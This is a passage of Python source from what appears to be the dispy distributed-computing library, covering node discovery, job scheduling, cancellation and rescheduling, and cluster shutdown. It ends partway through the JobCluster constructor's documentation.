                data = yield sock.recvall(min(xf.stat_buf.st_size-recvd, 1024000))
                if not data:
                    break
                fd.write(data)
                recvd += len(data)
            yield sock.send_msg(serialize(recvd))
        if recvd != xf.stat_buf.st_size:
            logger.warning('Transfer of file "%s" failed', tgt)
            # TODO: remove file?
os.utime(tgt, (xf.stat_buf.st_atime, xf.stat_buf.st_mtime)) os.chmod(tgt, stat.S_IMODE(xf.stat_buf.st_mode)) def send_ping_node(self, ip_addr, port=None, task=None): ping_msg = {'version': _dispy_version, 'sign': self.sign, 'port': self.port, 'node_ip_addr': ip_addr} ping_msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()] if not port: port = self.node_port if re.match('\d+\.', ip_addr): sock_family = socket.AF_INET else: sock_family = socket.AF_INET6 tcp_sock = AsyncSocket(socket.socket(sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) tcp_sock.settimeout(MsgTimeout) try: yield tcp_sock.connect((ip_addr, port)) yield tcp_sock.sendall(b'x' * len(self.auth)) yield tcp_sock.send_msg(b'PING:' + serialize(ping_msg)) except: pass tcp_sock.close() def broadcast_ping(self, addrinfos=[], port=None, task=None): # generator if not port: port = self.node_port ping_msg = {'version': _dispy_version, 'sign': self.sign, 'port': self.port} ping_msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()] if not addrinfos: addrinfos = self.addrinfos.values() for addrinfo in addrinfos: bc_sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_DGRAM)) bc_sock.settimeout(MsgTimeout) if addrinfo.family == socket.AF_INET: bc_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) else: # addrinfo.family == socket.AF_INET6 bc_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, struct.pack('@i', 1)) bc_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, addrinfo.ifn) bc_sock.bind((addrinfo.ip, 0)) try: yield bc_sock.sendto(b'PING:' + serialize(ping_msg), (addrinfo.broadcast, port)) except: pass bc_sock.close() def send_ping_cluster(self, cluster, task=None): for node_alloc in cluster._node_allocs: # TODO: we assume subnets are indicated by '*', instead of # subnet mask; this is a limitation, but specifying with # subnet mask a bit cumbersome. 
if node_alloc.ip_rex.find('*') >= 0: Task(self.broadcast_ping, port=node_alloc.port) else: ip_addr = node_alloc.ip_addr if ip_addr in cluster._dispy_nodes: continue port = node_alloc.port Task(self.send_ping_node, ip_addr, port) def poll_job_results(self, cluster, task=None): # generator for ip_addr in cluster._dispy_nodes: node = self._nodes.get(ip_addr, None) if not node or not node.port: continue sock = AsyncSocket(socket.socket(node.sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth} reply = yield node.send(b'PENDING_JOBS:' + serialize(req)) reply = deserialize(reply) except: logger.debug(traceback.format_exc()) continue finally: sock.close() for uid in reply['done']: _job = self._sched_jobs.get(uid, None) if _job is None: continue conn = AsyncSocket(socket.socket(node.sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) conn.settimeout(MsgTimeout) try: yield conn.connect((node.ip_addr, node.port)) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth, 'uid': uid, 'hash': _job.hash} yield conn.sendall(node.auth) yield conn.send_msg(b'RETRIEVE_JOB:' + serialize(req)) reply = yield conn.recv_msg() reply = deserialize(reply) except: logger.debug(traceback.format_exc()) continue else: if isinstance(reply, _JobReply): yield self.job_reply_process(reply, conn, (node.ip_addr, node.port)) else: logger.debug('Invalid reply for %s', uid) finally: conn.close() def add_cluster(self, cluster, task=None): compute = cluster._compute if self.shared: self._clusters[compute.id] = cluster for xf in compute.xfer_files: xf.compute_id = compute.id node = _Node(cluster.scheduler_ip_addr, cluster.scheduler_port, 0, '', '', platform='', keyfile=self.keyfile, certfile=self.certfile) node.auth = cluster._scheduler_auth self._nodes[cluster.scheduler_ip_addr] = node dispy_node = 
DispyNode(cluster.scheduler_ip_addr, None, 0) dispy_node.avail_info = node.avail_info cluster._dispy_nodes[dispy_node.ip_addr] = dispy_node info = self.shelf['_cluster'] info['port'] = self.port self.shelf['_cluster'] = info info = {'name': compute.name, 'auth': compute.auth, 'nodes': [cluster.scheduler_ip_addr]} self.shelf['compute_%s' % compute.id] = info info = {'port': cluster.scheduler_port, 'auth': cluster._scheduler_auth, 'scheduler': True} self.shelf['node_%s' % (cluster.scheduler_ip_addr)] = info self.shelf.sync() if cluster.poll_interval: self.poll_interval = num_min(self.poll_interval, cluster.poll_interval) if self.poll_interval: self.timer_task.resume(True) raise StopIteration # if a node is added with 'allocate_node', compute is already # initialized, so don't reinitialize it if compute.id is None: compute.id = self.compute_id self.compute_id += 1 self._clusters[compute.id] = cluster for xf in compute.xfer_files: xf.compute_id = compute.id info = {'name': compute.name, 'auth': compute.auth, 'nodes': []} self.shelf['compute_%s' % compute.id] = info self.shelf.sync() if compute.pulse_interval: self.pulse_interval = num_min(self.pulse_interval, compute.pulse_interval) if cluster.ping_interval: self.ping_interval = num_min(self.ping_interval, cluster.ping_interval) if cluster.poll_interval: self.poll_interval = num_min(self.poll_interval, cluster.poll_interval) if self.pulse_interval or self.ping_interval or self.poll_interval: self.timer_task.resume(True) self.send_ping_cluster(cluster) compute_nodes = [] for ip_addr, node in self._nodes.items(): if compute.id in node.clusters: continue for node_alloc in cluster._node_allocs: cpus = node_alloc.allocate(cluster, node.ip_addr, node.name, node.avail_cpus, avail_info=node.avail_info, platform=node.platform) if cpus <= 0: continue node.cpus = min(node.avail_cpus, cpus) compute_nodes.append(node) for node in compute_nodes: Task(self.setup_node, node, [compute]) yield None def del_cluster(self, cluster, 
task=None): # generator if self._clusters.pop(cluster._compute.id, None) != cluster: logger.warning('Cluster %s already closed?', cluster._compute.name) raise StopIteration if self.shared: sock = socket.socket(cluster.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) yield sock.connect((cluster.scheduler_ip_addr, cluster.scheduler_port)) yield sock.sendall(cluster._scheduler_auth) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth, 'terminate_pending': cluster._complete.is_set()} yield sock.send_msg(b'CLOSE:' + serialize(req)) sock.close() else: cid = cluster._compute.id cluster._jobs = [] cluster._pending_jobs = 0 # remove cluster from all nodes before closing (which uses # yield); otherwise, scheduler may access removed cluster # through node.clusters close_nodes = [] for dispy_node in cluster._dispy_nodes.values(): node = self._nodes.get(dispy_node.ip_addr, None) if not node: continue if not cluster._complete.is_set(): drop_jobs = [i for i, _job in enumerate(node.pending_jobs) if _job.compute_id == cid] for i in reversed(drop_jobs): node.pending_jobs.remove(i) node.clusters.discard(cid) close_nodes.append((Task(node.close, cluster._compute, terminate_pending=cluster._complete.is_set()), dispy_node)) cluster._dispy_nodes.clear() for close_task, dispy_node in close_nodes: yield close_task.finish() dispy_node.update_time = time.time() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) self.shelf.pop('compute_%s' % (cluster._compute.id), None) # TODO: prune nodes in shelf self.shelf.sync() def setup_node(self, node, computations, task=None): # generator task.set_daemon() for compute in computations: # NB: to avoid computation being sent multiple times, we # add to cluster's _dispy_nodes before sending computation # to node cluster = self._clusters.get(compute.id, None) if not cluster or node.ip_addr in 
cluster._dispy_nodes: continue dispy_node = DispyNode(node.ip_addr, node.name, node.cpus) dispy_node.avail_cpus = node.avail_cpus dispy_node.avail_info = node.avail_info cluster._dispy_nodes[node.ip_addr] = dispy_node self.shelf['node_%s' % (node.ip_addr)] = {'port': node.port, 'auth': node.auth} shelf_compute = self.shelf['compute_%s' % compute.id] shelf_compute['nodes'].append(node.ip_addr) self.shelf['compute_%s' % compute.id] = shelf_compute self.shelf.sync() r = yield node.setup(compute, exclusive=True, task=task) if r or compute.id not in self._clusters: cluster._dispy_nodes.pop(node.ip_addr, None) logger.warning('Failed to setup %s for compute "%s": %s', node.ip_addr, compute.name, r) # TODO: delete node from shelf's cluster._dispy_nodes del self.shelf['node_%s' % (node.ip_addr)] self.shelf.sync() yield node.close(compute, task=task) else: dispy_node.update_time = time.time() node.clusters.add(compute.id) self._sched_event.set() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Initialized, dispy_node, None))) def add_node(self, info): try: # assert info['version'] == _dispy_version assert info['port'] > 0 and info['cpus'] > 0 # TODO: check if it is one of ext_ip_addr? 
        except:
            # logger.debug(traceback.format_exc())
            return
        node = self._nodes.get(info['ip_addr'], None)
        if node is None:
            # brand new node
            logger.debug('Discovered %s:%s (%s) with %s cpus',
                         info['ip_addr'], info['port'], info['name'], info['cpus'])
            node = _Node(info['ip_addr'], info['port'], info['cpus'], info['sign'],
                         self.secret, platform=info['platform'],
                         keyfile=self.keyfile, certfile=self.certfile)
            node.name = info['name']
            node.avail_info = info['avail_info']
            self._nodes[node.ip_addr] = node
        else:
            # known node: refresh cpus/auth; if port or auth changed, the node
            # restarted, so abandon its jobs and detach it from clusters
            node.last_pulse = time.time()
            auth = auth_code(self.secret, info['sign'])
            if info['cpus'] > 0:
                node.avail_cpus = info['cpus']
                node.cpus = min(node.cpus, node.avail_cpus)
                for cid in node.clusters:
                    cluster = self._clusters[cid]
                    dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
                    if dispy_node:
                        dispy_node.avail_cpus = node.avail_cpus
                        dispy_node.cpus = node.cpus
            else:
                logger.warning('Invalid "cpus" %s from %s ignored',
                               info['cpus'], info['ip_addr'])
            if node.port == info['port'] and node.auth == auth:
                # nothing changed
                return
            logger.debug('Node %s rediscovered', info['ip_addr'])
            node.port = info['port']
            if node.auth is not None:
                dead_jobs = [_job for _job in self._sched_jobs.values()
                             if _job.node is not None and
                             _job.node.ip_addr == node.ip_addr]
                self.reschedule_jobs(dead_jobs)
                node.busy = 0
                node.auth = auth
                cids = list(node.clusters)
                node.clusters = set()
                for cid in cids:
                    cluster = self._clusters.get(cid, None)
                    if not cluster:
                        continue
                    dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None)
                    if dispy_node and cluster.status_callback:
                        self.worker_Q.put((cluster.status_callback,
                                           (DispyNode.Closed, dispy_node, None)))
            node.auth = auth
        # offer the node to clusters whose node allocations match it
        node_computations = []
        node.name = info['name']
        node.scheduler_ip_addr = info['scheduler_ip_addr']
        for cid, cluster in self._clusters.items():
            if cid in node.clusters:
                continue
            compute = cluster._compute
            for node_alloc in cluster._node_allocs:
                cpus = node_alloc.allocate(cluster, node.ip_addr, node.name,
                                           node.avail_cpus,
                                           avail_info=node.avail_info,
                                           platform=node.platform)
                if cpus <= 0:
                    continue
                node.cpus = min(node.avail_cpus, cpus)
                node_computations.append(compute)
                break
        if node_computations:
            Task(self.setup_node, node, node_computations)

    def worker(self):
        """Run queued user callbacks sequentially on the worker thread.

        A 'None' item shuts the thread down; callback exceptions are logged
        and swallowed so one bad callback cannot kill the thread.
        """
        # used for user callbacks only
        while 1:
            item = self.worker_Q.get(block=True)
            if item is None:
                self.worker_Q.task_done()
                break
            func, args = item
            try:
                func(*args)
            except:
                logger.debug('Running %s failed: %s',
                             func.__name__, traceback.format_exc())
            self.worker_Q.task_done()

    def finish_job(self, cluster, _job, status):
        """Mark '_job' finished with 'status', queue the user callback and,
        for terminal statuses, update the cluster's pending-job accounting."""
        # assert status in (DispyJob.Finished, DispyJob.Terminated, DispyJob.Abandoned)
        job = _job.job
        _job.finish(status)
        if cluster.callback:
            self.worker_Q.put((cluster.callback, (job,)))
        if status != DispyJob.ProvisionalResult:
            # assert cluster._pending_jobs > 0
            cluster._pending_jobs -= 1
            if cluster._pending_jobs == 0:
                cluster.end_time = time.time()
                cluster._complete.set()

    def job_reply_process(self, reply, sock, addr):
        """Validate and apply a job reply from a node: copy results into the
        user-visible job, update node/cluster accounting and ACK/NAK over
        'sock'."""
        _job = self._sched_jobs.get(reply.uid, None)
        if not _job or reply.hash != _job.hash:
            logger.warning('Ignoring invalid reply for job %s from %s',
                           reply.uid, addr[0])
            yield sock.send_msg(b'NAK')
            raise StopIteration
        job = _job.job
        job.ip_addr = reply.ip_addr
        node = self._nodes.get(reply.ip_addr, None)
        cluster = self._clusters.get(_job.compute_id, None)
        if cluster is None:
            # job cancelled while/after closing computation
            if node and node.busy > 0:
                node.busy -= 1
                node.cpu_time += reply.end_time - reply.start_time
                node.last_pulse = time.time()
                self._sched_event.set()
            yield sock.send_msg(b'ACK')
            raise StopIteration
        if node is None:
            if self.shared:
                # reply came via dispyscheduler from a node we haven't seen
                node = _Node(reply.ip_addr, 0, getattr(reply, 'cpus', 0), '',
                             self.secret, platform='', keyfile=None, certfile=None)
                self._nodes[reply.ip_addr] = node
                dispy_node = DispyNode(node.ip_addr, node.name, node.cpus)
                dispy_node.update_time = time.time()
                cluster._dispy_nodes[reply.ip_addr] = dispy_node
                if cluster.status_callback:
                    self.worker_Q.put((cluster.status_callback,
                                       (DispyNode.Initialized, dispy_node, None)))
            else:
                logger.warning('Ignoring invalid reply for job %s from %s',
                               reply.uid, addr[0])
                yield sock.send_msg(b'NAK')
                raise StopIteration
        node.last_pulse = time.time()
        # copy result payload into the user-visible job object
        job.result = deserialize(reply.result)
        job.stdout = reply.stdout
        job.stderr = reply.stderr
        job.exception = reply.exception
        job.start_time = reply.start_time
        job.end_time = reply.end_time
        logger.debug('Received reply for job %s / %s from %s',
                     job.id, _job.uid, job.ip_addr)
        # arguments no longer needed once the job has produced a result
        job._args = ()
        job._kwargs = {}
        if reply.status == DispyJob.ProvisionalResult:
            self.finish_job(cluster, _job, reply.status)
        else:
            del self._sched_jobs[_job.uid]
            dispy_node = cluster._dispy_nodes[node.ip_addr]
            if reply.status == DispyJob.Finished or reply.status == DispyJob.Terminated:
                node.busy -= 1
                node.cpu_time += reply.end_time - reply.start_time
                dispy_node.busy -= 1
                dispy_node.cpu_time += reply.end_time - reply.start_time
                dispy_node.jobs_done += 1
                dispy_node.update_time = time.time()
            elif reply.status == DispyJob.Cancelled:
                assert self.shared is True
                pass
            else:
                logger.warning('Invalid reply status: %s for job %s',
                               reply.status, _job.uid)
            dispy_job = _job.job
            self.finish_job(cluster, _job, reply.status)
            if cluster.status_callback:
                self.worker_Q.put((cluster.status_callback,
                                   (reply.status, dispy_node, dispy_job)))
            self._sched_event.set()
        yield sock.send_msg(b'ACK')

    def reschedule_jobs(self, dead_jobs):
        """Handle jobs whose node died: requeue them when the computation is
        reentrant and the job is not pinned, otherwise abandon them."""
        if not dead_jobs:
            return
        for _job in dead_jobs:
            cluster = self._clusters[_job.compute_id]
            del self._sched_jobs[_job.uid]
            dispy_node = cluster._dispy_nodes.get(_job.node.ip_addr, None)
            if dispy_node:
                dispy_node.cpus = 0
                dispy_node.busy = 0
                dispy_node.update_time = time.time()
            if cluster._compute.reentrant and not _job.pinned:
                logger.debug('Rescheduling job %s from %s',
                             _job.uid, _job.node.ip_addr)
                _job.job.status = DispyJob.Created
                _job.job.ip_addr = None
                _job.node = None
                # TODO: call 'status_callback'?
# _job.hash = ''.join(hex(x)[2:] for x in os.urandom(10)) cluster._jobs.append(_job) else: logger.debug('Job %s scheduled on %s abandoned', _job.uid, _job.node.ip_addr) # TODO: it is likely node finishes this job and sends # reply later; keep this in _abandoned_jobs and process reply? dispy_job = _job.job self.finish_job(cluster, _job, DispyJob.Abandoned) if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Abandoned, dispy_node, dispy_job))) self._sched_event.set() def run_job(self, _job, cluster, task=None): # generator node = _job.node dispy_node = cluster._dispy_nodes[node.ip_addr] try: yield _job.run(task=task) except EnvironmentError: logger.warning('Failed to run job %s on %s for computation %s; removing this node', _job.uid, node.ip_addr, cluster._compute.name) logger.debug(traceback.format_exc()) # TODO: remove the node from all clusters and globally? # this job might have been deleted already due to timeout node.clusters.discard(cluster._compute.id) if node.pending_jobs: for njob in node.pending_jobs: if njob.compute_id == cluster._compute.id: dispy_job = njob.job self.finish_job(cluster, njob, DispyJob.Cancelled) if cluster.status_callback and dispy_node: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, dispy_job))) node.pending_jobs = [njob for njob in node.pending_jobs if njob.compute_id != cluster._compute.id] if self._sched_jobs.pop(_job.uid, None) == _job: if not _job.pinned: cluster._jobs.insert(0, _job) node.busy -= 1 self._sched_event.set() except: logger.warning('Failed to run job %s on %s for computation %s', _job.uid, node.ip_addr, cluster._compute.name) logger.debug(traceback.format_exc()) # TODO: delay executing again for some time? 
# this job might have been deleted already due to timeout if self._sched_jobs.pop(_job.uid, None) == _job: dispy_job = _job.job self.finish_job(cluster, _job, DispyJob.Cancelled) if cluster.status_callback and dispy_node: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, dispy_job))) node.busy -= 1 self._sched_event.set() else: # job may have already finished (in which case _job.job would be None) if _job.job: _job.job.ip_addr = node.ip_addr logger.debug('Running job %s / %s on %s (busy: %d / %d)', _job.job.id, _job.uid, node.ip_addr, node.busy, node.cpus) _job.job.status = DispyJob.Running _job.job.start_time = time.time() dispy_node.busy += 1 dispy_node.update_time = time.time() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Running, dispy_node, _job.job))) if (not cluster._compute.reentrant) and (not cluster.status_callback) and _job.job: _job.job._args = () _job.job._kwargs = {} def load_balance_schedule(self): host = None load = 1.0 for node in self._nodes.values(): if node.busy >= node.cpus: continue if node.pending_jobs: host = node break if not any(self._clusters[cid]._jobs for cid in node.clusters): continue if (node.busy / node.cpus) < load: load = node.busy / node.cpus host = node return host def _schedule_jobs(self, task=None): # generator while not self.terminate: # n = sum(len(cluster._jobs) for cluster in self._clusters.values()) node = self.select_job_node() if not node: self._sched_event.clear() yield self._sched_event.wait() continue if node.pending_jobs: _job = node.pending_jobs.pop(0) else: # TODO: strategy to pick a cluster? 
                _job = None
                for cid in node.clusters:
                    if self._clusters[cid]._jobs:
                        _job = self._clusters[cid]._jobs.pop(0)
                        break
                if _job is None:
                    self._sched_event.clear()
                    yield self._sched_event.wait()
                    continue
            cluster = self._clusters[_job.compute_id]
            _job.node = node
            # assert node.busy < node.cpus
            self._sched_jobs[_job.uid] = _job
            node.busy += 1
            Task(self.run_job, _job, cluster)
        # ---- shutdown path: terminate/cancel whatever is still queued ----
        logger.debug('Scheduler quitting: %s', len(self._sched_jobs))
        self._sched_jobs = {}
        for cid in list(self._clusters.keys()):
            cluster = self._clusters[cid]
            if not hasattr(cluster, '_compute'):
                # cluster is closed
                continue
            for _job in cluster._jobs:
                if _job.job.status == DispyJob.Running:
                    status = DispyJob.Terminated
                else:
                    status = DispyJob.Cancelled
                dispy_job = _job.job
                self.finish_job(cluster, _job, status)
                if cluster.status_callback:
                    dispy_node = cluster._dispy_nodes.get(_job.node.ip_addr, None)
                    if dispy_node:
                        dispy_node.update_time = time.time()
                        self.worker_Q.put((cluster.status_callback,
                                           (status, dispy_node, dispy_job)))
            for dispy_node in cluster._dispy_nodes.values():
                node = self._nodes.get(dispy_node.ip_addr, None)
                if not node:
                    continue
                for _job in node.pending_jobs:
                    # TODO: delete only jobs for this cluster?
                    if _job.job.status == DispyJob.Running:
                        status = DispyJob.Terminated
                    else:
                        status = DispyJob.Cancelled
                    dispy_job = _job.job
                    self.finish_job(cluster, _job, status)
                    if cluster.status_callback:
                        dispy_node.update_time = time.time()
                        self.worker_Q.put((cluster.status_callback,
                                           (status, dispy_node, dispy_job)))
                node.pending_jobs = []
            cluster._jobs = []
            cluster._pending_jobs = 0
            yield self.del_cluster(cluster, task=task)
        self._clusters = {}
        self._nodes = {}
        logger.debug('Scheduler quit')

    def submit_job(self, _job, node=None, task=None):  # generator
        """Queue '_job' for scheduling; if 'node' is given, pin the job to that
        node's pending queue. Yields 0 on success, -1 on invalid node."""
        _job.uid = id(_job)
        cluster = self._clusters[_job.compute_id]
        if node:
            node = self._nodes.get(node.ip_addr, None)
            if not node or _job.compute_id not in node.clusters:
                raise StopIteration(-1)
            node.pending_jobs.append(_job)
            _job.pinned = node
        else:
            cluster._jobs.append(_job)
        cluster._pending_jobs += 1
        cluster._complete.clear()
        if cluster.status_callback:
            self.worker_Q.put((cluster.status_callback,
                               (DispyJob.Created, None, _job.job)))
        self._sched_event.set()
        yield 0

    def cancel_job(self, job, task=None):  # generator
        """Cancel 'job': remove it from the queue if not yet started, or ask
        its node to terminate it. Yields 0 on success, -1 on failure."""
        _job = job._dispy_job_
        if _job is None:
            logger.warning('Job %s is invalid for cancellation!', job.id)
            raise StopIteration(-1)
        cluster = self._clusters.get(_job.compute_id, None)
        if not cluster:
            logger.warning('Invalid job %s for cluster "%s"!',
                           _job.uid, cluster._compute.name)
            raise StopIteration(-1)
        # assert cluster._pending_jobs >= 1
        if _job.job.status == DispyJob.Created:
            # still queued: just remove it locally
            if _job.pinned:
                _job.pinned.pending_jobs.remove(_job)
            else:
                cluster._jobs.remove(_job)
            dispy_job = _job.job
            self.finish_job(cluster, _job, DispyJob.Cancelled)
            if cluster.status_callback:
                self.worker_Q.put((cluster.status_callback,
                                   (DispyJob.Cancelled, None, dispy_job)))
            logger.debug('Cancelled (removed) job %s', _job.uid)
            raise StopIteration(0)
        elif not (_job.job.status == DispyJob.Running or
                  _job.job.status == DispyJob.ProvisionalResult or
                  _job.node is None):
            logger.warning('Job %s is not valid for cancel (%s)',
                           _job.uid, _job.job.status)
            raise StopIteration(-1)
        _job.job.status = DispyJob.Cancelled
        # don't send this status - when job is terminated status/callback get called
        logger.debug('Job %s / %s is being terminated', _job.job.id, _job.uid)
        resp = yield _job.node.send(b'TERMINATE_JOB:' + serialize(_job),
                                    reply=False, task=task)
        if resp != 0:
            logger.debug('Terminating job %s / %s failed: %s',
                         _job.job.id, _job.uid, resp)
            resp = -1
        raise StopIteration(resp)

    def allocate_node(self, cluster, node_alloc, task=None):  # generator
        """Add node allocation(s) to 'cluster'; already-known matching nodes
        are attached immediately, the rest are discovered via add_cluster."""
        if not isinstance(node_alloc, list):
            node_alloc = [node_alloc]
        node_allocs = _parse_node_allocs(node_alloc)
        if not node_allocs:
            raise StopIteration(-1)
        # iterate in reverse so deletions don't shift pending indices
        for i in range(len(node_allocs)-1, -1, -1):
            node = self._nodes.get(node_allocs[i].ip_addr, None)
            if node:
                dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
                if dispy_node:
                    node.clusters.add(cluster._compute.id)
                    self._sched_event.set()
                    del node_allocs[i]
                    continue
        if not node_allocs:
            raise StopIteration(0)
        cluster._node_allocs.extend(node_allocs)
        cluster._node_allocs = sorted(cluster._node_allocs,
                                      key=lambda node_alloc: node_alloc.ip_rex,
                                      reverse=True)
        # de-duplicate by ip_rex, keeping first occurrence
        # (set.add returns None, so 'not present.add(...)' is always True)
        present = set()
        cluster._node_allocs = [na for na in cluster._node_allocs
                                if na.ip_rex not in present and
                                not present.add(na.ip_rex)]
        del present
        yield self.add_cluster(cluster, task=task)
        yield self._sched_event.set()
        raise StopIteration(0)

    def deallocate_node(self, cluster, node, task=None):  # generator
        """Detach 'node' (address or name) from 'cluster' so no new jobs of
        this cluster are scheduled on it. Yields 0 on success, -1 if unknown."""
        node = _node_ipaddr(node)
        node = self._nodes.get(node, None)
        if node is None:
            raise StopIteration(-1)
        node.clusters.discard(cluster._compute.id)
        yield 0

    def close_node(self, cluster, node, terminate_pending, task=None):  # generator
        """Detach 'node' from 'cluster' and close the computation on it,
        handling this cluster's jobs still pending on the node."""
        node = _node_ipaddr(node)
        node = self._nodes.get(node, None)
        if node is None:
            raise StopIteration(-1)
        node.clusters.discard(cluster._compute.id)
        jobs = [_job for _job in node.pending_jobs
                if _job.compute_id == cluster._compute.id]
        if cluster.status_callback:
            dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
            for _job in jobs:
self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, _job.job))) if jobs: node.pending_jobs = [_job for _job in node.pending_jobs if _job.compute_id != cluster._compute.id] yield node.close(cluster._compute, terminate_pending=terminate_pending) def set_node_cpus(self, node, cpus, task=None): # generator try: cpus = int(cpus) except ValueError: raise StopIteration(-1) node = _node_ipaddr(node) node = self._nodes.get(node, None) if node is None: cpus = -1 else: if cpus >= 0: node.cpus = min(node.avail_cpus, cpus) elif (node.avail_cpus + cpus) >= 0: node.cpus = node.avail_cpus + cpus cpus = node.cpus for cid in node.clusters: cluster = self._clusters[cid] dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: dispy_node.cpus = cpus yield self._sched_event.set() raise StopIteration(cpus) def send_file(self, cluster, node, xf, task=None): node = self._nodes.get(node.ip_addr, None) if not node: raise StopIteration(-1) yield node.xfer_file(xf) def node_jobs(self, cluster, node, from_node, task=None): # generator ip_addr = node node = self._nodes.get(ip_addr, None) if not node: node = _node_ipaddr(ip_addr) if node: node = self._nodes.get(node, None) if not node or cluster._compute.id not in node.clusters: raise StopIteration([]) if from_node: sock = socket.socket(node.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: yield sock.connect((node.ip_addr, node.port)) yield sock.sendall(node.auth) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth} yield sock.send_msg(b'JOBS:' + serialize(req)) info = yield sock.recv_msg() _jobs = [self._sched_jobs.get(uid, None) for uid in deserialize(info)] jobs = [_job.job for _job in _jobs if _job] except: logger.debug(traceback.format_exc()) jobs = [] sock.close() else: jobs = [_job.job for _job in self._sched_jobs.values() if _job.node == node and _job.compute_id == cluster._compute.id] raise 
StopIteration(jobs) def shutdown(self): # non-generator if not self.shared: if self.terminate: return if any(cluster._pending_jobs for cluster in self._clusters.values()): return logger.debug('Shutting down scheduler ...') self.terminate = True def _terminate_scheduler(self, task=None): yield self._sched_event.set() Task(_terminate_scheduler, self).value() self.worker_Q.put(None) self._scheduler.value() self.worker_Q.join() if self.shelf: # TODO: need to check all clusters are deleted? self.shelf.close() self.shelf = None for ext in ('', '.db', '.bak', '.dat', '.dir'): if os.path.isfile(self.recover_file + ext): try: os.remove(self.recover_file + ext) except: pass class JobCluster(object): """Create an instance of cluster for a specific computation. """ def __init__(self, computation, nodes=None, depends=[], callback=None, cluster_status=None, ip_addr=None, port=None, node_port=None, ext_ip_addr=None, dest_path=None, loglevel=logger.INFO, setup=None, cleanup=True, ping_interval=None, pulse_interval=None, poll_interval=None, reentrant=False, secret='', keyfile=None, certfile=None, recover_file=None): """Create an instance of cluster for a specific computation. @computation is either a string (which is name of program, possibly with full path) or a python function or class method. @nodes is a list. Each element of @nodes is either a string (which must be either IP address or name of server node), or a tuple with up to 3 elements. The tuple's first element must be IP address or name of server node, second element, if present, must be port number where that node is listening for ping from clients, the third element, if present, must be number of CPUs to use on that node. @depends is a list. Each element of @depends is either a string or a python object. If the element is a string, it must be a file which will be transferred to the node executing a job for this cluster. 
        If the element is a python object (a function name, class name etc.),
        then the code for that object is transferred to the node executing
        a job for this cluster.

        @callback is a function or class method. When a job's results
        become available, dispy will call provided callback function/method
        with that job as the argument. If a job sends provisional results
        with 'dispy_provisional_result' multiple times, then dispy will call
        provided callback each such time. The (provisional) results of
        computation can be retrieved with 'result' field of job, etc. While
        computations are run on nodes in isolated environments, callbacks
        are run in the context of user programs from which (Shared)JobCluster
        is called - for example, callbacks can access global variables in
        user programs.

        @cluster_status is a function or class method. When a node
        accepts this cluster's computation, a job is submitted, a job is
        done or node is closed, given function is called with three
        parameters: an instance of DispyNode, node/job status (one of
        DispyNode.Initialized, DispyNode.Closed, or job status), and an
        instance of DispyJob (if job submitted, finished etc.) or None (if
        node started or closed). dispy queues these status messages and a
        worker thread calls the functions, so it is possible that actual
        current status of node may be different from the status indicated
        at the time status function is called.

        @ip_addr and @port indicate the address where the cluster will bind
        to. If multiple instances of JobCluster are used, these arguments
        are used only in the case of first instance. If no value for
        @ip_addr is given (default), IP address associated with the
        'hostname' is used. If no value for @port is given (default),
        number 51347 is used.

        @ext_ip_addr is the IP address of NAT firewall/gateway if dispy
        client is behind that firewall/gateway.

        @node_port indicates port on which node servers are listening for
        ping messages. The client (JobCluster instance) broadcasts ping
        requests to this port.
If no value for @node_port is given (default), number 51348 is used. @dest_path indicates path of directory to which files are transferred to a server node when executing a job. If @computation is a string, indicating a program, then that program is also transferred to @dest_path. @loglevel indicates message logging level. @cleanup indicates if the files transferred should be removed when shutting down. @secret is a string that is (hashed and) used for handshaking of communication with nodes. @certfile is path to file containing SSL certificate (see Python 'ssl' module). @keyfile is path to file containing private key for SSL communication (see Python 'ssl' module). This key may be stored in 'certfile' itself, in which case this should be None. @ping_interval is number of seconds between 1 and 1000. Normally dispy can find nodes running 'dispynode' by broadcasting 'ping' messages that nodes respond to. However, these packets may get lost. If ping_interval is set, then every ping_interval seconds, dispy sends ping messages to find nodes that may have missed earlier ping messages. @pulse_interval is number of seconds between 1 and 1000. If pulse_interval is set, dispy directs nodes to send 'pulse' messages to indicate they are computing submitted jobs. A node is presumed dead if 5*pulse_interval elapses without a pulse message. See 'reentrant' below. @poll_interval is number of seconds between 5 and 1000. If poll_interval is set, the client uses polling to check the status of jobs executed by nodes, instead of nodes connecting to the client to send the status of jobs, which is not possible if the client is behind a gateway / router which doesn't forward ports to where the client is running. Polling is not efficient, so it must be used only where necessary. @reentrant must be either True or False. This value is used only if 'pulse_interval' is set for any of the clusters. 
